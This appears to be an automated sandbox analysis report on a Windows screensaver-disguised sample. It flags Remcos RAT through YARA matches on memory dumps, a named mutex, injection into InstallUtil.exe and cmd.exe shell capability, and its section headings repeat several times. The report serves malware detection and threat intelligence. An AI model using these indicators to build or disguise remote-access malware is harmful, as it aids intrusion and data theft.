Source: Yara match	File source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1513148426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7120, type: MEMORYSTR

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-RRTJVV

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3747543577.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1493124688.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3746761477.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe PID: 8840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 9048, type: MEMORYSTR

Contains functionality to launch a control a shell (cmd.exe)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: cmd.exe

3_2_00405042

Windows Analysis Report
OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Windows Analysis Report OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Windows Analysis Report
OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

Malware Threat Intel
Provided by